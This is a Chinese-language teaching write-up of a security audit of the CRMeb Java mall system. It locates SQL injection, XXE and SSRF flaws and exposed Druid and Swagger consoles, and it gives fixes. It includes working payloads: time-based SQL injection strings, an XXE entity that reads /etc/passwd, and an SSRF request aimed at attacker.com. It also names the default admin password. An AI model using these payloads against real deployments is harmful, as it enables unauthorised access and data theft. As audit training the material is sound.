CRMeb Java版安全审计与漏洞分析教学文档<\/h1>

1. 项目概述<\/h2>

CRMeb商城Java版是一个开源电商系统，技术栈包括：<\/p>

后端：SpringBoot + Mybatis Plus + Redis<\/li>
前端：Uniapp + Vue + elementUI<\/li>
其他：Maven + Swagger<\/li>

功能模块：产品管理、用户管理、订单系统、营销系统（优惠券、积分）、权限管理等<\/li> <\/ul>

2. 环境搭建<\/h2>

2.1 准备工作<\/h3>

下载源码：https:\/\/gitee.com\/ZhongBangKeJi\/crmeb_java\/archive\/refs\/tags\/v1.3.4.zip<\/code><\/li>

安装依赖：Maven + Node.js<\/li>
<\/ol>
2.2 后端配置<\/h3>

修改数据库配置：crmeb-admin\/src\/main\/resources\/application.yml<\/code><\/li>
创建数据库并导入SQL：sql\/Crmeb_1.3.4.sql<\/code><\/li>
启动后端：默认访问http:\/\/127.0.0.1:8080\/doc.html<\/code>(Swagger文档)<\/li>
<\/ol>
2.3 前端配置<\/h3>

修改配置：admin\/.env.development<\/code><\/li>
安装依赖：npm install<\/code><\/li>
启动前端：npm run dev<\/code><\/li>
默认后台账号：admin\/123456<\/li>
<\/ol>
3. 漏洞分析<\/h2>
3.1 SQL注入漏洞<\/h3>
漏洞点1：订单管理模块<\/h4>

文件位置<\/strong>：src\/main\/resources\/mapper\/store\/StoreOrderMapper.xml<\/code><\/li>
方法<\/strong>：getRefundPrice<\/code><\/li>
漏洞参数<\/strong>：keywords<\/code><\/li>
漏洞原因<\/strong>：直接使用${}<\/code>拼接SQL语句，未做参数过滤<\/li>
调用链<\/strong>：

StoreOrderService.getWriteOffList()<\/code><\/li>
StoreOrderController.getWriteOffList()<\/code><\/li>
<\/ul>
<\/li>
利用方式<\/strong>：
SELECT<\/span> *<\/span> FROM<\/span> table<\/span> WHERE<\/span> keywords =<\/span> '1'<\/span> AND<\/span> (SELECT<\/span> 1<\/span> FROM<\/span> (SELECT<\/span> SLEEP(5<\/span>))x)-- '
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
漏洞点2：用户管理模块<\/h4>

文件位置<\/strong>：src\/main\/resources\/mapper\/user\/UserMapper.xml<\/code><\/li>
方法<\/strong>：findAdminList<\/code><\/li>
漏洞参数<\/strong>：groupId<\/code><\/li>
调用链<\/strong>：

UserService.getAdminList()<\/code><\/li>
UserController.getAdminList()<\/code><\/li>
<\/ul>
<\/li>
利用方式<\/strong>：
GET<\/span> \/<\/span>api\/<\/span>user<\/span>\/<\/span>list?<\/span>groupId=<\/span>1<\/span> AND<\/span> (SELECT<\/span> 1<\/span> FROM<\/span> (SELECT<\/span> SLEEP(5<\/span>))x)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
其他注入点<\/h4>

全局搜索${<\/code>可发现多处类似漏洞<\/li>
重点关注MyBatis中直接使用${}<\/code>而非#{}<\/code>的地方<\/li>
<\/ul>
3.2 XXE漏洞<\/h3>
漏洞点1：XML解析<\/h4>

文件位置<\/strong>：SAXReader<\/code>相关代码<\/li>
漏洞原因<\/strong>：使用SAXReader<\/code>解析用户可控的XML输入<\/li>
利用方式<\/strong>：
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> ]>
<\/span><\/span><root><\/span>&xxe;<\/root><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3.3 SSRF漏洞（理论存在）<\/h3>
漏洞点：图片合并功能<\/h4>

文件位置<\/strong>：ImageMergeUtil<\/code>相关代码<\/li>
漏洞原因<\/strong>：直接使用用户提供的URL发起HTTP请求<\/li>
限制条件<\/strong>：

需要提供至少2个图片URL<\/li>
需要特定权限（可能配置问题导致未复现成功）<\/li>
<\/ul>
<\/li>
利用方式<\/strong>：
POST<\/span> \/api\/merge\/images<\/span>
<\/span><\/span>{
<\/span><\/span>  "list"<\/span>: [
<\/span><\/span>    {"url"<\/span>: "http:\/\/attacker.com"<\/span>},
<\/span><\/span>    {"url"<\/span>: "http:\/\/internal.service"<\/span>}
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3.4 XSS漏洞（理论存在）<\/h3>

参考GitHub issue：#12<\/li>
未复现成功，可能已修复<\/li>
<\/ul>
3.5 组件漏洞<\/h3>
3.5.1 Druid未授权访问<\/h4>

直接访问\/druid<\/code>路径<\/li>
无需认证即可查看数据库监控信息<\/li>
<\/ul>
3.5.2 Swagger文档泄露<\/h4>

直接访问\/doc.html<\/code><\/li>
暴露所有API接口信息<\/li>
<\/ul>
4. 修复建议<\/h2>
4.1 SQL注入修复<\/h3>

将所有${}<\/code>替换为#{}<\/code><\/li>
添加参数过滤<\/li>
使用MyBatis的预编译功能<\/li>
<\/ol>
4.2 XXE修复<\/h3>

禁用外部实体解析：
saxReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>saxReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>saxReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.3 SSRF修复<\/h3>

校验URL域名白名单<\/li>
禁用非常用协议（如file:\/\/, gopher:\/\/等）<\/li>
设置连接超时<\/li>
<\/ol>
4.4 组件安全<\/h3>

为Druid控制台添加认证<\/li>
生产环境禁用Swagger文档<\/li>
<\/ol>
5. 审计技巧<\/h2>


MyBatis审计<\/strong>：<\/p>

全局搜索${<\/code><\/li>
检查Mapper.xml中的动态SQL<\/li>
<\/ul>
<\/li>

XXE审计<\/strong>：<\/p>

搜索SAXReader<\/code>, DocumentBuilder<\/code>, XMLInputFactory<\/code>等关键词<\/li>
<\/ul>
<\/li>

SSRF审计<\/strong>：<\/p>

搜索URLConnection<\/code>, HttpClient<\/code>, OkHttp<\/code>等网络请求相关代码<\/li>
<\/ul>
<\/li>

组件审计<\/strong>：<\/p>

检查application.yml<\/code>中的组件配置<\/li>
检查依赖版本是否存在已知漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
6. 参考资源<\/h2>

官方文档：https:\/\/doc.crmeb.com\/java\/crmeb_java\/2211<\/li>
GitHub Issues：https:\/\/github.com\/crmeb\/crmeb_java\/issues<\/li>
CVE数据库：可查询相关组件的已知漏洞<\/li>
<\/ol>

CRMeb Java版安全审计与漏洞分析教学文档<\/h1>

2. 环境搭建<\/h2>

3. 漏洞分析<\/h2>

3.1 SQL注入漏洞<\/h3>

3.2 XXE漏洞<\/h3>

3.3 SSRF漏洞（理论存在）<\/h3>

3.5 组件漏洞<\/h3>

4. 修复建议<\/h2>

6. 参考资源<\/h2> 官方文档：https:\/\/doc.crmeb.com\/java\/crmeb_java\/2211<\/li> GitHub Issues：https:\/\/github.com\/crmeb\/crmeb_java\/issues<\/li> CVE数据库：可查询相关组件的已知漏洞<\/li> <\/ol>

6. 参考资源<\/h2>

官方文档：https:\/\/doc.crmeb.com\/java\/crmeb_java\/2211<\/li>
GitHub Issues：https:\/\/github.com\/crmeb\/crmeb_java\/issues<\/li>
CVE数据库：可查询相关组件的已知漏洞<\/li> <\/ol>